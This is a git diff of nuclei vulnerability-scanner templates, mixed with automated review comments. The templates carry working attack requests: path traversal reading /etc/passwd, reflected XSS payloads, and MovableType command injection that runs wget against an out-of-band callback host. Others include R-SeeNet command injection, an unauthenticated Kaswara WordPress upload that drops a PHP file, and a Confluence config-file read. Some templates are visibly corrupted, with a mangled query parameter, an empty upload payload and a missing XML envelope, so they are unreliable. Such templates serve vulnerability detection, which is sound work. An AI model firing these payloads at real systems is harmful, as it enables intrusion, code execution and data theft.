@@ -1,39 +0,0 @@ -id: CVE-20200924a - -info: - name: Web requests can navigate outside of DRP controlled areas - Directory traversal - author: c-sh0 - severity: critical - description: Web requests can navigate outside of DRP controlled areas - Directory traversal - reference: - - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html - - https://docs.rackn.io/en/latest/doc/release.html - - https://registry.hub.docker.com/v1/repositories/digitalrebar/provision/tags - - Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others) - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-20200924a - cwe-id: CWE-22 - tags: cve,cve2020,lfi,rackn,digitalrebar - -requests: - - method: GET - path: - - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'X-Drp-Sha256sum:' - - - type: regex - regex: - - "root:.*:0:0" - diff --git a/nuclei-templates/CVE-2020/cve-20200924a.yaml b/nuclei-templates/CVE-2020/cve-20200924a.yaml new file mode 100644 index 0000000000..7bfd8f9b88 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-20200924a.yaml 
@@ -0,0 +1,33 @@ +id: CVE-20200924a +info: + name: Web requests can navigate outside of DRP controlled areas - Directory traversal + author: c-sh0 + severity: critical + description: Web requests can navigate outside of DRP controlled areas - Directory traversal + reference: + - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html + - https://docs.rackn.io/en/latest/doc/release.html + - https://registry.hub.docker.com/v1/repositories/digitalrebar/provision/tags + - Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others) + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-20200924a + cwe-id: CWE-22 + tags: cve,cve2020,lfi,rackn,digitalrebar +requests: + - method: GET + path: + - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - 'X-Drp-Sha256sum:' + - type: regex + regex: + - "root:.*:0:0" diff --git a/nuclei-templates/CVE-2021/cve-2021-1498.yaml b/nuclei-templates/CVE-2021/CVE-2021-1498.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-1498.yaml rename to nuclei-templates/CVE-2021/CVE-2021-1498.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-20092.yaml b/nuclei-templates/CVE-2021/CVE-2021-20092.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20092.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20092.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-20124.yaml b/nuclei-templates/CVE-2021/CVE-2021-20124.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-20124.yaml rename to nuclei-templates/CVE-2021/CVE-2021-20124.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-20137.yaml b/nuclei-templates/CVE-2021/CVE-2021-20137.yaml deleted file mode 100644 index ec87cd9710..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-20137.yaml +++ /dev/null 
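Review bot: `CVE-20200924a` is not a CVE identifier (the format is CVE-YYYY-NNNN); it appears to be RackN's own advisory name from the referenced docs.rackn.io page, so `id`, `cve-id` and the `cve,cve2020` tags mislabel this template and will confuse anything that indexes by CVE — use a vendor-style id such as `rackn-drp-directory-traversal`, drop `cve-id`, and keep the advisory URL in `reference`. The entry `- Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others)` is prose inside the `reference` list, which is expected to hold URLs; move it into `description`. This file is otherwise the same content as the `cve-20200924a(1).yaml` removed in this commit with blank lines stripped, so the same fixes apply to nothing else.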
@@ -1,35 +0,0 @@ -id: CVE-2021-20137 -info: - name: Gryphon Tower - Reflected XSS - author: edoardottt - severity: medium - description: A reflected cross-site scripting vulnerability exists in the url parameter of the /cgi-bin/luci/site_access/ page on the Gryphon Tower router's web interface. An attacker could exploit this issue by tricking a user into following a specially crafted link, granting the attacker javascript execution in the context of the victim's browser. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-20137 - cwe-id: CWE-79 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-20137 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137 - - https://www.tenable.com/security/research/tra-2021-51 - tags: cve,cve2021,gryphon,xss -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/html" - - type: word - part: body - words: - - 'onfocus=alert(document.domain) autofocus=1>' - - 'Send Access Request URL' - condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-20837.yaml b/nuclei-templates/CVE-2021/CVE-2021-20837.yaml index d9fa45c868..8433e63c9d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-20837.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-20837.yaml 
@@ -1,23 +1,56 @@ id: CVE-2021-20837 info: - name: RCE in MovableType - author: zin_min_phyo + name: MovableType - Remote Command Injection + author: dhiyaneshDK,hackergautam severity: critical - reference: https://nemesis.sh/posts/movable-type-0day/ - tags: MovableType,RCE + description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. + reference: + - https://nemesis.sh/posts/movable-type-0day/ + - https://github.com/ghost-nemesis/cve-2021-20837-poc + - https://twitter.com/cyber_advising/status/1454051725904580608 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-20837 + cwe-id: CWE-78 + tags: cve,cve2021,rce,movable requests: - - method: POST - path: - - "{{BaseURL}}/cgi-bin/mt/mt-xmlrpc.cgi" + - raw: + - | + POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml - body: 'mt.handler_to_coderefYGNhdCAvZXRjL3Bhc3N3ZGA=' + + + mt.handler_to_coderef + + + + + {{base64("`wget http://{{interactsh-url}}`")}} + + + + + - - + matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + words: + - "failed loading package" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/cve-2021-21287.yaml b/nuclei-templates/CVE-2021/CVE-2021-21287.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21287.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21287.yaml 
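Review bot: The new description's version string reads `MovableType 5002 and earlier (Movable Type Advanced 7 Series)` and `6.8. 2`, which looks like a mangled copy of the advisory text; it should presumably read `Movable Type 7 r.5002 and earlier` and `6.8.2`, so confirm the wording against the NVD entry in `reference`. As rendered here the request body shows only `mt.handler_to_coderef` and the base64 parameter with no XML-RPC envelope; if the `<methodCall>`/`<params>` wrapping was really lost rather than stripped in this view, the endpoint will not dispatch the method. The three matchers are ANDed, so a host that makes the interactsh callback but returns a different error body or status is not reported; a comment such as `# "failed loading package" is the expected response when the injected handler name fails to load` would make that coupling explicit for maintainers.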
diff --git a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml new file mode 100644 index 0000000000..44d996dca0 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-21799 +info: + name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting + author: arafatansari + severity: medium + description: | + Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality. + reference: + - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-21799 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"R-SeeNet" + verified: "true" + tags: cve,cve2021,xss,r-seenet +requests: + - method: GET + path: + - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Telnet " + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21801.yaml b/nuclei-templates/CVE-2021/CVE-2021-21801.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21801.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21801.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-21802.yaml b/nuclei-templates/CVE-2021/CVE-2021-21802.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21802.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21802.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21805.yaml b/nuclei-templates/CVE-2021/CVE-2021-21805.yaml deleted file mode 100644 index 46e88b33e8..0000000000 
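Review bot: `Refleced` in the description should be `Reflected`, and `v 2.4.12` reads better as `2.4.12`. As rendered here the body matcher contains only `"Telnet "`; if the reflected `</title><script>alert(document.domain)</script><title>` prefix from the request was actually omitted from the words list rather than lost in this view, every telnet_form.php page will match regardless of whether the payload is echoed unescaped, so the matcher should carry the full reflected string.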
--- a/nuclei-templates/CVE-2021/CVE-2021-21805.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-21805 -info: - name: Advantech R-SeeNet v 2.4.12 - OS Command Injection - author: arafatansari - severity: critical - description: | - Advantech R-SeeNet v 2.4.12 is vulnerable to OS Command Injection in the ping.php script functionality. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-21805 - cwe-id: CWE-78 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,rce,r-seenet -requests: - - method: GET - path: - - "{{BaseURL}}/php/ping.php?hostname=|dir" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Ping |dir" - - "bottom.php" - condition: and - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21881.yaml b/nuclei-templates/CVE-2021/CVE-2021-21881.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21881.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21881.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-22873.yaml b/nuclei-templates/CVE-2021/CVE-2021-22873.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-22873.yaml rename to nuclei-templates/CVE-2021/CVE-2021-22873.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24210.yaml b/nuclei-templates/CVE-2021/CVE-2021-24210.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24210.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24210.yaml 
diff --git a/nuclei-templates/CVE-2021/cve-2021-24274.yaml b/nuclei-templates/CVE-2021/CVE-2021-24274.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24274.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24274.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24284.yaml b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml new file mode 100644 index 0000000000..f2e969c7a6 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml 
@@ -0,0 +1,62 @@ +id: CVE-2021-24284 +info: + name: WordPress Kaswara Modern VC Addons - File Upload RCE + author: lamscun,pussycat0x,pdteam + severity: critical + description: | + The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. + reference: + - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 + - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 + - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ + - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ + - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24284 + cwe-id: CWE-434 + tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload +variables: + zip_file: "{{to_lower(rand_text_alpha(6))}}" + php_file: "{{to_lower(rand_text_alpha(2))}}.php" + php_cmd: "" +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 + + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" + Content-Type: application/octet-stream + + 
{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fontsetname" + + {{zip_file}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="action" + + uploadFontIcon + --------------------------d3be34324392a708-- + - | + GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" + - type: word + part: body_2 + words: + - "phpinfo()" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24291.yaml b/nuclei-templates/CVE-2021/CVE-2021-24291.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24291.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24291.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24300.yaml b/nuclei-templates/CVE-2021/CVE-2021-24300.yaml deleted file mode 100644 index 04d0926f66..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24300.yaml +++ /dev/null 
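Review bot: The zip bytes in `hex_decode` hard-code the archive's metadata: the local header declares a 6-byte name (`0600`, matching the two-letter `{{php_file}}` plus `.php`) and a 20-byte entry (`14000000`), while the central directory entry declares 19 bytes (`13000000`) with a different CRC, so `php_cmd` must stay exactly the length whichever of the two the server's unzip trusts, and the archive has to be regenerated if the payload or file-name length changes — a comment above `variables` should say so. `php_cmd` is empty as rendered here, which would upload a zero-length file and never match `phpinfo()` in `body_2`; if the `<?php … ?>` body was lost rather than stripped in this view, the template cannot fire. The template also leaves the uploaded file at `/wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}}` on the target with no cleanup step; the `intrusive` tag is set, but the description should state that operators must remove the dropped file after a positive result.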
@@ -1,44 +0,0 @@ -id: CVE-2021-24300 -info: - name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS - author: cckuailong - severity: medium - description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24300 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24300 - cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'value="\"onmouseover=alert(document.domain);//">' - - "PickPlugins Product Slider" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24335.yaml b/nuclei-templates/CVE-2021/CVE-2021-24335.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24335.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24335.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24472.yaml b/nuclei-templates/CVE-2021/CVE-2021-24472.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24472.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24472.yaml 
diff --git a/nuclei-templates/CVE-2021/cve-2021-24498.yaml b/nuclei-templates/CVE-2021/CVE-2021-24498.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-24498.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-24498.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-24746.yaml b/nuclei-templates/CVE-2021/CVE-2021-24746.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-24746.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-24746.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-24987.yaml b/nuclei-templates/CVE-2021/CVE-2021-24987.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-24987.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-24987.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24991.yaml b/nuclei-templates/CVE-2021/CVE-2021-24991.yaml
new file mode 100644
index 0000000000..a8de905167
--- /dev/null
+++ b/nuclei-templates/CVE-2021/CVE-2021-24991.yaml
@@ -0,0 +1,47 @@
+id: CVE-2021-24991
+
+info:
+ name: WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting
+ author: cckuailong
+ severity: medium
+ description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.
+ reference:
+ - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24991
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2021-24991
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated,wpscan
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
+ - "WooCommerce PDF Invoices"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by cs 08/16/2022
diff --git a/nuclei-templates/CVE-2021/cve-2021-25028.yaml b/nuclei-templates/CVE-2021/CVE-2021-25028.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-25028.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-25028.yaml
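Review bot: The second request's query string reads `page=wpo_wcpdf_options_page§ion=...` — `§` is what `&sect` becomes after HTML-entity decoding, so the `section` parameter the description and the matcher depend on is not actually sent as shown; the line should be `GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1` (verify whether the `§` is a rendering artifact or really in the file). Nothing checks that the `wp-login.php` POST succeeded before the reflected-XSS request is issued, so bad credentials are indistinguishable from "not vulnerable"; at minimum note this in `info` or match on the `wordpress_logged_in` cookie of the first response. The sibling XSS templates in this commit also require `text/html` in the response header, which keeps the `" style=animation-name:...` word match from firing on a JSON or plain-text error body — add the same `part: header` matcher here.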
diff --git a/nuclei-templates/CVE-2021/cve-2021-25052.yaml b/nuclei-templates/CVE-2021/CVE-2021-25052.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-25052.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-25052.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-25085.yaml b/nuclei-templates/CVE-2021/CVE-2021-25085.yaml
new file mode 100644
index 0000000000..6dae7e423c
--- /dev/null
+++ b/nuclei-templates/CVE-2021/CVE-2021-25085.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021-25085
+info:
+ name: WOOF WordPress plugin - Reflected Cross-Site Scripting
+ author: Maximus Decimus
+ severity: medium
+ description: |
+ The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.
+ reference:
+ - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90
+ - https://plugins.trac.wordpress.org/changeset/2648751
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25085
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25085
+ metadata:
+ verified: true
+ tags: cve,cve2021,wordpress,wp-plugin,wp,xss
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]="
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"additional_fields":[""]}'
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
+
+# Enhanced by cs 06/21/2022
diff --git a/nuclei-templates/CVE-2021/CVE-2021-25118.yaml b/nuclei-templates/CVE-2021/CVE-2021-25118.yaml
deleted file mode 100644
index f037f16c59..0000000000
--- a/nuclei-templates/CVE-2021/CVE-2021-25118.yaml
+++ /dev/null
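Review bot: The `classification` block omits `cwe-id: CWE-79` although this is a reflected XSS and the CVE-2021-24991 template added in the same commit carries it; add `cwe-id: CWE-79` after `cve-id`. Note also that the request sends no script payload — `woof_redraw_elements[]=` is empty and the matcher only looks for the reflected `"additional_fields":[""]}` served as `text/html` — so this is a reflection fingerprint rather than a demonstration of execution; a comment above `path:` such as `# no payload: an empty element reflected verbatim in a text/html response is the vulnerable condition` would stop readers from treating the `'"additional_fields":[""]}'` match as a weak or accidental hit.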
@@ -1,39 +0,0 @@ -id: CVE-2021-25118 -info: - name: Yoast SEO < 17.3 - Path Disclosure - author: DhiyaneshDK - severity: medium - description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. - reference: - - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 - - https://plugins.trac.wordpress.org/changeset/2608691 - remediation: Fixed in version 17.3 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-25118 - cwe-id: CWE-200 - tags: wordpress,cve2021,wp-plugin,fpd,cve,wp -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1" - matchers-condition: and - matchers: - - type: regex - regex: - - '"path":"(.*)/wp-content\\(.*)","size' - - type: word - part: header - words: - - "application/json" - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '"path":"(.*)/wp-content\\(.*)","size' diff --git a/nuclei-templates/CVE-2021/CVE-2021-25120.yaml b/nuclei-templates/CVE-2021/CVE-2021-25120.yaml deleted file mode 100644 index 62a8c9e125..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25120.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2021-25120 -info: - name: Easy Social Feed < 6.2.7 - Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor. - reference: - - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0 - - https://www.cvedetails.com/cve/CVE-2021-25120/ - - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25120 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "'type' : ''" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-26085.yaml b/nuclei-templates/CVE-2021/CVE-2021-26085.yaml new file mode 100644 index 0000000000..f2032f23ff --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-26085.yaml 
@@ -0,0 +1,34 @@
+id: CVE-2021-26085
+info:
+ name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085
+ author: princechaddha
+ severity: medium
+ description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.
+ reference:
+ - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26085
+ - https://jira.atlassian.com/browse/CONFSERVER-67893
+ - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-26085
+ cwe-id: CWE-862
+ metadata:
+ shodan-query: http.component:"Atlassian Confluence"
+ tags: cve,cve2021,confluence,atlassian,lfi,kev
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - "Confluence"
+ - "com.atlassian.confluence.setup.ConfluenceAppConfig"
+ condition: and
diff --git a/nuclei-templates/CVE-2021/CVE-2021-26702.yaml b/nuclei-templates/CVE-2021/CVE-2021-26702.yaml
deleted file mode 100644
index 67a641543d..0000000000
--- a/nuclei-templates/CVE-2021/CVE-2021-26702.yaml
+++ /dev/null
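Review bot: The `reference` list carries the same PacketStorm advisory twice, once as `https://packetstormsecurity.com/files/164401/...` and again as `http://packetstormsecurity.com/files/164401/...`; drop the `http://` duplicate. The matcher pair itself is sound — status 200 together with the `com.atlassian.confluence.setup.ConfluenceAppConfig` class name that only a served `WEB-INF/web.xml` would contain — but for a `kev`-tagged finding a `remediation:` line naming the fixed versions from the linked CONFSERVER-67893 ticket would make the result actionable; I have not verified those versions here, so take them from the advisory rather than from memory.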
